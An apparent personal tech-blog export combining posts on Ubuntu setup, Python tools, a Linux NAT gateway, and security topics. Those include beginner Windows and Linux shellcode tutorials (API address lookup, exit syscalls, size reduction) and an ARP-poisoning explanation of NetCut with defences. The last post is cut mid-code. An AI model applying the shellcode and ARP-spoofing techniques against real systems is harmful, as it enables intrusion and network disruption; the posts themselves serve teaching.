After knowing the chipset, it's time to find out what kind of driver/module that I need.
Actually, installing the new wireless driver is very simple in ubuntu 12.04. Just type
sudo apt-get install backport-module-cw-$kernel_version
the kernel_version is your kernel version which can use uname command to verify it.
After this instruction, it will install almost all the wireless module(atheros or broadcom chipset) from newer kernel version.
Hope this post can help others. :)
</div>
Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-60559903155270300022012-05-19T06:27:00.002-07:002014-03-08T08:47:31.399-08:00windows shellcode 1: IntroductionOk, this is another shellcode tutorial. However, this time I'm gonna focus on windows shellcoding technique.<br />
<br />
In the previous shellcode tutorial, I'm using linux as my environment. After research and google for a while, I think it's time to write something about windows shellcode.<br />
<br />
The most significant difference between linux shellcode and windows shellcode is that when writing linux shellcode we use system call to achieve the goal we want. However, in windows, the system call will various in different version. Therefore, when writing windows shellcode, we have to use windows API to achieve the goal.<br />
<br />
There are several ways to get the windows API address and the most simple one is using GetProcAddress() and LoadLibraryA() in kernel32.dll.<br />
I use the following C program to demonstrate how to use these two API.<br />
<br />
<br />
<pre class="brush: cpp">
#include <windows.h>
#include <stdio.h>
int main() {
unsigned int api_addr = 0;
api_addr = GetProcAddress(LoadLibraryA("kernel32.dll"), "ExitProcess");
printf("address 0x%x\n", api_addr);
}
</pre>
<br />
In the above example the api_addr will contains the virtual address of ExitProcess().<br />
<i><b>P.S You can get more information of windows API in MSDN.</b></i><br />
<br />
After knowing the address of ExitProcess, it's time to write a simple shellcode that will exit the program.<br />
<br />
<pre class="brush: cpp">
.global _main
_main:
pushl $0;
movl $0xdeadbeef, %ebx;
call *%ebx;
</pre>
<br />
In the above assembly code, you have to change the $0xdeadbeef to the API address the previous C program output to you. And the reason why using <i><b>call *%ebx</b></i> instead of <i><b>call $0xdeadbeef</b></i> is that when using call $0xdeadbeef the assembler will compile the code into a relative call instead of a direct call; therefore the result may not be what we are expected. I have mentioned this in the previous post. If you want u can check here.<br />
<a href="http://mike820324.blogspot.com/2011/05/shell-code.html">http://mike820324.blogspot.com/2011/05/shell-code.html</a><br />
<br />
This post is only a brief introduction of windows shellcode, I will post more advanced technique and shellcode later these days.Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-17132422763270464792012-05-15T08:00:00.001-07:002012-05-15T08:01:43.265-07:00Some Great Python ToolsRecently, I start to learn python since it is very convenient and powerful. And I'm gonna introduce some great python tools that will be very helpful in the future work.<br />
<br />
<span style="font-size: x-large;">1. pip </span><br />
The first one is pip. It is a tool that will help you managing the python packages. A great replacement for easy_install, but more powerful.<br />
In Ubuntu, you can simply install pip by typing<br />
<b>sudo apt-get install python-pip</b><br />
<br />
or you can download the package from the following link<br />
<a href="http://pypi.python.org/pypi/pip#downloads">http://pypi.python.org/pypi/pip#downloads</a><br />
untar the file and type<br />
<b>sudo python setup.py</b><br />
<br />
U can use pip to install python package either from web site or tar files.<br />
type<br />
<b>pip search $PACKAGE_NAME</b><br />
and it will search the package 4 u.<br />
<br />
simply type<br />
<b>pip install $PACKAGE_NAME</b><br />
will help u install the package to your system.<br />
<span style="font-size: x-large;"><br /></span><br />
<span style="font-size: x-large;">2. virtualenv & virtualenvwrapper</span><br />
<span style="font-size: large;"><span style="font-size: small;">The second tool I'm gonna introduce is virtualenv. It is a tool to help u creating a virtual python environment </span></span>to solve the consistency problem.<br />
In Ubuntu, simply type<br />
<b>sudo apt-get install python-virtualenv</b><br />
<br />
or u can use pip to help you install virtualenv, just type<br />
<b>sudo pip install virtualenv</b><br />
<br />
And if you have many projects that need to be managed, virtualenvwrapper is a very good choice. The tools contains some wrapper function from virtualenv and help u ease your job.<br />
<br />
If u want to get familiar with virtualenv and virtualenvwrapper the following links are some good tutorials about these tools.<br />
<a href="http://mathematism.com/2009/07/30/presentation-pip-and-virtualenv/">http://mathematism.com/2009/07/30/presentation-pip-and-virtualenv/</a><br />
<a href="http://www.doughellmann.com/articles/pythonmagazine/completely-different/2008-05-virtualenvwrapper/index.html">http://www.doughellmann.com/articles/pythonmagazine/completely-different/2008-05-virtualenvwrapper/index.html</a><br />
<a href="http://simononsoftware.com/virtualenv-tutorial/">http://simononsoftware.com/virtualenv-tutorial/</a><br />
<br />
<span style="font-size: x-large;">3. scapy</span><br />
<span style="font-size: x-large;"><span style="font-size: small;">scapy is a very powerful tool for packet manipulation and packet sniffing. If you want to play with packets and learn some internet protocols or doing some internet forensic or pen-testing it is a very useful tools. The official documentation is great start to </span></span>learn scapy. I will also post some tutorial of how to use scapy in the future.<br />
<a href="http://www.secdev.org/projects/scapy/doc/index.html">http://www.secdev.org/projects/scapy/doc/index.html</a><br />
<a href="http://fossies.org/dox/scapy-2.2.0/annotated.html">http://fossies.org/dox/scapy-2.2.0/annotated.html</a><br />
<a href="http://www.secdev.org/projects/scapy/">http://www.secdev.org/projects/scapy/</a><br />
<br />
want to install just type<br />
<b>sudo pip install scapy</b><br />
or<br />
<b>sudo apt-get install python-scapy </b><br />
<br />
<span style="font-size: x-large;">4. Django or Pyramid</span><br />
<span style="font-size: small;">Django and Pyramid are both high-level web framework for programmers to develop their </span>own web project in a rapid way. In short, they are "ruby on rails " in python :P<br />
Even though both tools can help people organize their web framework, but they are still different.<br />
The comparison of these two framework can be found in these links. <br />
<a href="http://stackoverflow.com/questions/48681/pros-cons-of-django-vs-pylons">http://stackoverflow.com/questions/48681/pros-cons-of-django-vs-pylons</a><br />
<a href="http://xiaonuogantan.wordpress.com/2011/12/24/pyramid-vs-django/">http://xiaonuogantan.wordpress.com/2011/12/24/pyramid-vs-django/</a><br />
<a href="http://www.slideshare.net/whykay/python-ireland-may-2011-what-is-pyramid-and-where-is-it-with-respect-to-django-by-kevin-gill">http://www.slideshare.net/whykay/python-ireland-may-2011-what-is-pyramid-and-where-is-it-with-respect-to-django-by-kevin-gill</a><br />
There are still more, you can just google for that.<br />
<br />
Here are some links that will help u dig deeper in Django.<br />
<a href="https://docs.djangoproject.com/en/1.4/">https://docs.djangoproject.com/en/1.4/</a><br />
<a href="http://www.djangobook.com/en/2.0/">http://www.djangobook.com/en/2.0/</a><br />
<br />
And also some links for Pyramid<br />
<a href="http://docs.pylonsproject.org/en/latest/docs/pyramid.html">http://docs.pylonsproject.org/en/latest/docs/pyramid.html</a><br />
<br />
<span style="font-size: x-large;">5. Scrapy</span><br />
<span style="font-size: small;">Scrapy is a high-level python web crawling framework. If you want to design some web robot or web spider, Scrapy is a good choice.</span><br />
<br />
<span style="font-size: small;">The documentation of scrapy is right here</span><br />
<a href="http://scrapy.org/doc/"><span style="font-size: small;">http://scrapy.org/doc/ </span></a><br />
<br />
want to install just type<br />
<b>sudo pip install scrapy</b><br />
or<br />
<b>sudo apt-get install python-scrapy</b>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-81008691403922595332011-12-27T05:32:00.000-08:002011-12-27T05:36:19.236-08:00What the hell is "NetCut" doing and how to preventNetCut is a program that will help you disconnect other computers in the same subnet of an ethernet network. You can download the program from this link: <a href="http://www.arcai.com/arcai-netcut-faq.html">NetCut.</a><br />
In this post I will describe the technical detail about NetCut and how to prevent this kind of program/attack.<br />
<br />
<b>I. Technical Detail About NetCut:</b><br />
NetCut use a simple technique called "ARP poisoning" or sometimes called "ARP spoofing". It is a attack technique usually used to trigger an Man In The Middle attack. Before introducing the ARP poisoning, we have to know what is ARP.<br />
ARP is the abbreviation of Address Resolution Protocol. According to wiki, <i>"ARP is a protocol used for resolution network layer address to link layer address</i>." That is, ARP will map the IP address of a machine to it's MAC address. <br />
Consider the following LAN from Fig. 1:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxdtMtwgr5rPIyxaIvpOnaydcLqIODT0yVr4gzRX2c45ULN_oimAeUBvIsyY_6WxYcjoVuQfctHG5ozmVJM4_Msn_bGD8ek19pGzLba6gfj9oRg8EobM65q85yG20AnTCiwFPoRHZZkGQ/s1600/LAN_example.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxdtMtwgr5rPIyxaIvpOnaydcLqIODT0yVr4gzRX2c45ULN_oimAeUBvIsyY_6WxYcjoVuQfctHG5ozmVJM4_Msn_bGD8ek19pGzLba6gfj9oRg8EobM65q85yG20AnTCiwFPoRHZZkGQ/s640/LAN_example.jpg" width="640" /></a></div>
<span style="font-size: x-small;"><figure 1> Local Area Network Example</span><br />
<br />
Now If Alice want to send a Packet to Bob, Alice machine will check if the MAC address of IP 192.168.0.3 is exist in the ARP cache table. If it is not exist in the table, it will broadcast a ARP request asking for the MAC address of 192.168.0.3. While Bob's machine receive the broadcast message, it will reply it's MAC address to Alice. Fig. 2 shows the communication process.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYP-jXPuR32DyM3YL_P_5A7CZNWtlBNXq5xgNmwy94lBY6kjaNGBx2fX4YA4Frk0Wmnp8XOnAmbXFcqlvhZ9ib-W2qrckH0uZnf1Q2ylc2GVy184a3j8_2L-vKGNjAvoQx-CuVyrVE4/s1600/ARP-process.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYP-jXPuR32DyM3YL_P_5A7CZNWtlBNXq5xgNmwy94lBY6kjaNGBx2fX4YA4Frk0Wmnp8XOnAmbXFcqlvhZ9ib-W2qrckH0uZnf1Q2ylc2GVy184a3j8_2L-vKGNjAvoQx-CuVyrVE4/s640/ARP-process.jpg" width="640" /></a></div>
<br />
<span style="font-size: x-small;"><figure 2> ARP communication process</span><br />
<br />
After knowing the ARP, it's time to introduce the "ARP poisoning attack". Consider the following condition. What if Evil reply the ARP request before Bob when Alice broadcast the ARP request. In this scenario, Alice's machine will think that the MAC address of IP 192.168.0.3 is 00:00:00:00:00:03(MAC address of Evil), instead of 00:00:00:00:00:04(MAC address of Bob). Therefore, Alice will send the packet to Evil instead of Bob.Fig. 3 shows the process of this attack.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0CAlFuoScv81JEUZprM1shnQxvOobxwMCf3GVN0BWRdg_Kzpmx4DnhyphenhyphenEP23wk0i1QfxrahE9DKE0-2B_pOWc7pOJc4cK2gM-5poc_BvFfMkwTOiSyROHZad4pzajH1adexK2of3QaYyw/s1600/Arp_spoofing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0CAlFuoScv81JEUZprM1shnQxvOobxwMCf3GVN0BWRdg_Kzpmx4DnhyphenhyphenEP23wk0i1QfxrahE9DKE0-2B_pOWc7pOJc4cK2gM-5poc_BvFfMkwTOiSyROHZad4pzajH1adexK2of3QaYyw/s640/Arp_spoofing.jpg" width="640" /></a></div>
<br />
<span style="font-size: x-small;"><figure 3> ARP posioning attack</span><br />
What if Evil send the ARP reply with a non-exist MAC address of the gateway, then Alice's machine will become a DoS condition. This is how NetCut disconnect other computer in the same subnet. <br />
<br />
<b>II. Prevention of ARP poisoning:</b><br />
The best way to prevent your computer being poisoned is use a static ARP instead of dynamic. In both windows and linux system, there is a command called <b>arp</b> which can let you check the arp cache table and moreover change the dynamic table into static.<br />
You can also installed some application such as <b>arpwatch in unix</b> and <b>Xarp-v2 in winodws</b> to defense this kind of attack.<br />
<br />
<b>III. reference website:</b><br />
<a href="http://insecure.org/sploits/arp.games.html">ARP and ICMP redirection</a><br />
<a href="http://en.wikipedia.org/wiki/ARP_spoofing">arp-spoofing wiki</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-31352770164000632322011-12-26T08:55:00.000-08:002011-12-27T04:05:10.311-08:00What can you do when linux is not respondingLinux is a very stable system compare to windows(:P). However even it is very stable, it will still crash sometimes.<br />
So what can you do if the system is crashed.<br />
<br />
<b><i>1. go to the tty:</i></b><br />
Sometimes, it is the graphic mode crash but the linux kernel and other critical process are still alive.<br />
If you have encounter this situations, There is no need to reboot your system.<br />
Instead, you can goto tty to fix the problem.<br />
In linux system you can go to tty by pressing [ctrl]+[alt]+[f1~f7].<br />
The default graphic mode is in tty7, that is you can press [ctrl]+[alt]+[f7] to return to graphic mode. <br />
A tty is a pure command prompt and you can restart the x-server from here.<br />
ubuntu 11.10 use lightdm, so I take lightdm as an example.<br />
type the following command:<br />
<b>sudo /etc/init.d/lightdm restart</b><br />
that's it, and you will see the graphic mode is restarted.<br />
<br />
<b><i>2. the magical sysrq:</i></b><br />
If your system crash and the keyboard has no respond, it's time to use the sysrq.<br />
What is a sysrq, it is a little button on your keyboard. Normally, it is near the delete key . If your system crash, and you can not enter the tty mode. Try the following combination keys:<br />
<b>[alt]+[sysrq]+[R]->
[alt]+[sysrq]+[E]->
[alt]+[sysrq]+[I]->
[alt]+[sysrq]+[S]->
[alt]+[sysrq]+[U]->
[alt]+[sysrq]+[B]</b><br />
If everything works fine, your system will reboot but will save some files and safely kill the process that you are working on.<br />
So what the hell is going on under these combination keys?<br />
The following show you the functionality of each keys.<br />
<br />
a. [alt]+[sysrq]+[R] : turn your keyboard into ascii mode, it enables your keyboard to send message to the kernel directly.<br />
b. [alt]+[sysrq]+[E] : send SIGTERM signal to all the process except the init process.<br />
c. [alt]+[sysrq]+[I] : send SIGKILL signal to all the process except the init process. This will kill all the processes except the init process.<br />
d. [alt]+[sysrq]+[S] : sync the buffer pool to the hard disk, in case to lose datas.<br />
e. [alt]+[sysrq]+[U] : remount all the mounted-filesystem to read-only.<br />
f. [alt]+[sysrq]+[B] : reboot the system. <br />
<i>p.s while using the combinations, use it slowly. :P</i><br />
<i>That
is, after using the first combination, wait about 5 secs and then use
the second one and so on. If you use the combinations too quick it is no
difference than press the power key. </i><br />
<i>The recommend wait time is:</i><br />
<i>R--1 sec-- > E--30 sec --> I-- 10 sec --> S --5 sec --> U -- 5 sec --> B</i><br />
<i> </i><br />
If you want to know more detailed about the sysrq the following link has a very good explanations.<br />
English version: <br />
<a href="http://ubuntuforums.org/showthread.php?t=617349">Magic sysrq</a><br />
Chinese version:<br />
<i><a href="https://www.deleak.com/blog/2010/10/20/sysrq/">https://www.deleak.com/blog/2010/10/20/sysrq/</a></i>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com2tag:blogger.com,1999:blog-1191178933370250826.post-38833710348196870212011-12-26T08:16:00.000-08:002011-12-26T08:17:11.571-08:00Ubuntu 11.10 NotesIt's been a really long time that I haven't write a new post. My school work is fucking busy.<br />
I have installed ubuntu 11.10 for a while. I decided to write some note about the installation and configuration process.<br />
<br />
Installing ubuntu 11.10 is quite easy, just put the disk into the computer, follow the steps and yes you have installed your ubuntu 11.10.<br />
<br />
<i><b>1. video drivers:</b></i><br />
I'm using ATI video cards, and meet some problem while using the default video drivers.<br />
There are many solution of this problem. I just post the solution I used:<br />
First, go to AMD official website and download the video device dirver.<br />
The one I'm using is "ati-driver-installer-11-11-x86.x86_64.run"<br />
and type the following command and reboot, and the video driver is installed.<br />
<span style="font-size: small;"><b><i>mkdir ati-11.11;<br />
cd ati-11.11<br />
wget www2.ati.com/drivers/linux/ati-driver-installer-11-12-x86.x86_64.run<br />
sh ati-driver-installer-11-11-x86.x86_64.run --buildpkg Ubuntu/oneiric<br />
dpkg -i fglrx*.deb<br />
aticonfig --initial -f</i></b></span>
<br />
If you still meet some problems, the following websites maybe a good place<br />
to search your solutions.<br />
<a href="https://wiki.ubuntu.com/X/Troubleshooting/FglrxInteferesWithRadeonDriver#Problem:__Need_to_fully_remove_-fglrx_and_reinstall_-ati_from_scratch">x/troubeshooting</a><br />
<a href="http://wiki.cchtml.com/index.php/Ubuntu_Oneiric_Installation_Guide#Installing_Catalyst_Manually_.28from_AMD.2FATI.27s_site.29">ubuntu install guide</a><br />
<a href="http://www.shainmiley.com/wordpress/2011/10/24/ubuntu-11-10-gnome-shell-ati-drivers-multiple-monitors/">ubuntu+gnome shell+ati driver</a><br />
<a href="http://ubuntuforums.org/showthread.php?p=11482929#post11482929">gnome shell doesn't work properly</a>
<br />
<br />
<i><b>2. Installing some applications</b></i><br />
a. upgrade the app: type the following command and upgrade the applications that already install in the system.<br />
<b>sudo apt-get update && sudo apt-get upgrade</b><br />
<br />
b. install the restricted packages: this will enable you to play some popular music/video formats such as mp3 and so on. Type the follwoing command:<br />
<b>sudo apt-get install ubuntu-restricted-extra</b><br />
<br />
c. enable full dvd play back: After that you can watch videos from dvds.<br />
The instruction is too long, so I post the original link and you can follow the instructions from those websites.<br />
<a href="http://www.ubuntugeek.com/install-mplayer-and-multimedia-codecs-libdvdcss2w32codecsw64codecs-on-ubuntu-11-10-oneiric.html">install libdvdcss</a><br />
<a href="http://www.techdrivein.com/2011/10/15-things-i-did-after-installing-new.html">15 things I did...</a><br />
<br />
d. and more: There are still more applications you may want to installed. Reference this link:<br />
<a href="http://blog.sudobits.com/2011/10/30/best-applications-and-tweaks-for-ubuntu-11-10/">Best applications and tweeks ....</a><br />
<br />
This is pretty much about it.Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-82618698078940921032011-12-09T12:38:00.001-08:002011-12-17T07:33:55.763-08:00wargame competition TaiwanYou can download the questions in the following link: <br />
<a href="http://ppl.ug/ueDHa3zS5Xs/">wargames </a><br />
<br />
<br />
However the archive file is encrypted, if u want the key please send me an email.<br />
mike820324@gmail.com <br />
<br />
Description of each questions is listed in t.txt files.<br />
<br />Natatahttp://www.blogger.com/profile/12882754703987950280noreply@blogger.com3tag:blogger.com,1999:blog-1191178933370250826.post-9141941732894624082011-11-28T07:29:00.000-08:002011-11-28T07:29:39.436-08:00ubuntu 11.10 plus plasma widgetI recently install the ubuntu 11.10. I spent some time to get used to the unity interface.<br />
But the unity shell is lack of widgets and therefore I decided to install the plasma-desktop to my ubuntu. :P<br />
<br />
<br />
<span style="font-size: large;"><b>1. install the package by the following command:</b></span><br />
apt-get install plasma-desktop plasma-scriptengine-python<br />
<span style="font-size: large;"><b>2. create launcher to start the plasma desktop:</b></span><br />
type gnome-desktop-item-edit ~/Desktop --create-new<br />
and it will popup a dialog box.<br />
select "application" in the type field,<br />
filled "plasma-desktop" or whatever u like in the name field,<br />
filled "plasma-desktop" in the command field,<br />
and press ok.<br />
P.S u can also create a launcher to stop the plasma by filled the command field with killall plasma-desktop.<br />
<b><span style="font-size: large;">3. Let plasma looks better in unity</span></b><br />
a. System Settings > Application Appearance > Widget Style > GTK+<br />
b. System Settings > Workspace Appearance > Desktop theme > Get new theme<br />
c. Search for ‘Ambiance’<br />
d. install it and use it.<br />
e. remove the bottom panel if u don't like it.<br />
<span style="font-size: large;"><b>4. Use the nautilus as default folder manager</b></span><br />
control center(system setting) > file associations > inode > directory [ then add: "nautilus --no-desktop" ]<br />
or you can just install dolphin if u don't like the nautilus. <br />
<br />
That's it enjoy!! <br />
<br />
reference website:<br />
<a href="http://www.omgubuntu.co.uk/2011/05/how-to-run-kde-plasma-widgets-in-ubuntu-unity/">http://www.omgubuntu.co.uk/2011/05/how-to-run-kde-plasma-widgets-in-ubuntu-unity/</a><br />
<a href="https://bbs.archlinux.org/viewtopic.php?id=48046">https://bbs.archlinux.org/viewtopic.php?id=48046</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-26856155006788830982011-11-12T08:25:00.000-08:002011-11-12T08:25:41.020-08:00setting linux as a gateway<div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-large;">Introduction: </span></div><div style="font-family: "Courier New",Courier,monospace;">Since my school project need to set up an ethernet environment. I need to create an internal network under virtualbox. The first step is to setup the gateway inside a virtualbox. After google for a while, I finally setting up my linux as a gateway. </div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: large;">Environment : </span></div><div style="font-family: "Courier New",Courier,monospace;">linux distribution: alpine linux 2.3</div><div style="font-family: "Courier New",Courier,monospace;">kernel version: 3.0</div><div style="font-family: "Courier New",Courier,monospace;"> virtualbox network adapter setting:</div><div style="font-family: "Courier New",Courier,monospace;"> 1. host-only network=> eth0 for internal network.</div><div style="font-family: "Courier New",Courier,monospace;"> 2. bridged network => eth1 for internet. </div><div style="font-family: "Courier New",Courier,monospace;">the connection state is like the following figure:</div><div style="font-family: "Courier New",Courier,monospace;"><figure> </div><div style="font-family: "Courier New",Courier,monospace;"><<internet>>----------<<alpine linux>>------------<<internal>></div><div style="font-family: "Courier New",Courier,monospace;"> eth1 pppoe eth0 NAT</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><span style="font-family: "Courier New",Courier,monospace;">P.S </span><br />
<span style="font-family: "Courier New",Courier,monospace;">The reason why I use alpine linux instead of other distribution is that it is tiny but contains the utilities that to set up my environment.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">alpine linux </span><span style="font-family: "Courier New",Courier,monospace;">download link:</span><br />
<span style="font-family: "Courier New",Courier,monospace;"><a href="http://alpinelinux.org/">http://alpinelinux.org/</a></span><br />
<span style="font-family: "Courier New",Courier,monospace;">alpine linux </span><span style="font-family: "Courier New",Courier,monospace;">installation guide:</span><br />
<span style="font-family: "Courier New",Courier,monospace;"><a href="http://wiki.alpinelinux.org/wiki/Installation">http://wiki.alpinelinux.org/wiki/Installation</a> </span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-large;">Content: </span></span><br />
<span style="font-family: "Courier New",Courier,monospace;">I'll write down all the steps that I configure the internet.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">include: </span><br />
<span style="font-family: "Courier New",Courier,monospace;">1. package requirement</span><br />
<span style="font-family: "Courier New",Courier,monospace;">2. configure the network interface</span><br />
<span style="font-family: "Courier New",Courier,monospace;">3. setting up the iptables</span><br />
<span style="font-family: "Courier New",Courier,monospace;">4. enable packet forwarding</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> </span><span style="font-size: large;"><span style="font-family: "Courier New",Courier,monospace;">1.package requirement:</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"></span><br />
<b><span style="font-family: "Courier New",Courier,monospace;">rp-pppoe => pppoe client side program</span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;">iptables => firewall</span></b><br />
<span style="font-family: "Courier New",Courier,monospace;"><b>ppp => ppp deamon</b></span><br />
<span style="font-family: "Courier New",Courier,monospace;">that's all. </span><br />
<br />
<span style="font-size: large;"><i><span style="font-family: "Courier New",Courier,monospace;">2.configure the network interface</span></i></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="font-size: small;"><span style="font-size: large;">2.1. the internal network:</span></span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> configure the /etc/network/interface</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> add the following line to the file.</span><br />
<pre>auto eth0
iface eth0 inet static
address <span style="color: #008c00;">192</span>.<span style="color: #008c00;">168</span>.<span style="color: #008c00;">56</span>.<span style="color: #008c00;">254</span>
netmask <span style="color: #008c00;">255</span>.<span style="color: #008c00;">255</span>.<span style="color: #008c00;">255</span>.<span style="color: #008c00;">0</span>
network <span style="color: #008c00;">192</span>.<span style="color: #008c00;">168</span>.<span style="color: #008c00;">56</span>.<span style="color: #008c00;">0</span>
broadcast <span style="color: #008c00;">192</span>.<span style="color: #008c00;">168</span>.<span style="color: #008c00;">6</span>.<span style="color: #008c00;">255</span><span style="color: #008c00;"></span></pre><span style="font-family: "Courier New",Courier,monospace;"> the address, netmask, network and broadcast can be changed according to you network setting. </span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="font-size: large;">2.2.pppoe configuration:</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> type </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <b>pppoe-setting</b> => to start pppoe configuration. </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> After setting up type </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <b>pppoe-connect</b> => connect to the internet via pppoe. </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> You can check the result by typing:</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <b>ifconfig | less</b></span><br />
<br />
<span style="font-size: large;"><span style="font-family: "Courier New",Courier,monospace;">3.setting up the iptables:</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> type the following command to set the iptables rules: </span><br />
<div style="font-family: "Courier New",Courier,monospace;"> <b>iptables -A FORWARD -o eth1 -i eth0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT</b></div><div style="font-family: "Courier New",Courier,monospace;"><b> iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT </b></div><div style="font-family: "Courier New",Courier,monospace;"><b> iptables -A POSTROUTING -t nat -j MASQUERADE</b> </div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: large;">4.enable packet forwarding:</span></div><div style="font-family: "Courier New",Courier,monospace;"> type </div><div style="font-family: "Courier New",Courier,monospace;"> <b>echo 1 > /proc/sys/net/ipv4/ip_forward</b></div><div style="font-family: "Courier New",Courier,monospace;"> type</div><div style="font-family: "Courier New",Courier,monospace;"> <b>cat /proc/sys/net/ipv4/ip_forward</b> => check the result.</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-large;">reference website:</span></div><div style="font-family: "Courier New",Courier,monospace;">http://wiki.alpinelinux.org/wiki/Alpine_Linux_package_management#Packages_and_Repositories</div><div style="font-family: "Courier New",Courier,monospace;">http://www.linuxfromscratch.org/blfs/view/6.2.0/connect/other.html</div><div style="font-family: "Courier New",Courier,monospace;">http://tldp.org/HOWTO/DSL-HOWTO/configure.html</div><div style="font-family: "Courier New",Courier,monospace;">http://www.brennan.id.au/05-Broadband_Connectivity.html</div><div style="font-family: "Courier New",Courier,monospace;">https://help.ubuntu.com/community/Internet/ConnectionSharing</div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-52983532721899918412011-10-31T05:43:00.000-07:002014-03-08T08:54:06.919-08:00shell code 6(reduced the shellcode size)The size of shellcode is very important. Therefore I list some of the tricks that can reduce the shellcode size and moreover rewirte our shellcode to reduce the size.<br />
<br />
1.<br />
Instead of using movl $constant , %register, use xor, mul and lea instead. The instruction of moving constant to register cost five bytes, but xor, mul and lea only cost 1 to 3 bytes. This can reduce many size of the shellcode.<br />
<br />
The following is a quick example for the exit system call.<br />
This is the original one that I write in the previous articles.<br />
<pre class="brush: cpp">
int main() {
__asm__("movw $1, %eax;\
movw $0, %ebx;\
int $0x80;");
return 0;
}
</pre>
The size of each instruction is<br />
<div style="font-family: "Courier New",Courier,monospace;">mov $1, %eax => 5 bytes.</div><div style="font-family: "Courier New",Courier,monospace;">mov $0, %ebx => 5 bytes.</div><div style="font-family: "Courier New",Courier,monospace;">int $0x80 => 2 bytes.</div><div style="font-family: "Courier New",Courier,monospace;">------------------------------------ </div><div style="font-family: "Courier New",Courier,monospace;">total bytes 12 bytes.</div><br />
However if rewrite the shellcode into the following code:<br />
<pre class="brush: cpp">
int main() {
__asm__("xorl %ebx, %ebx;\
leal 0x1(%ebx), %eax;\
int $0x80;");
return 0;
}
</pre>
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">The size of the shellcode become:</span></span><br />
<div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">xorl %ebx, %ebx => 2 bytes</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">leal 0x1(%ebx), %eax => 3 bytes</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">int $0x80 => 2 bytes</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span"> --------------------------------------------</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">total size 7 bytes</span></div><br />
<div style="font-family: inherit;"><span class="Apple-style-span">yes, reduce 5 bytes of the shellcode. :D</span></div><div style="font-family: inherit;"><span class="Apple-style-span">another example of reducing the shellcode:</span></div>
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 0x20;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
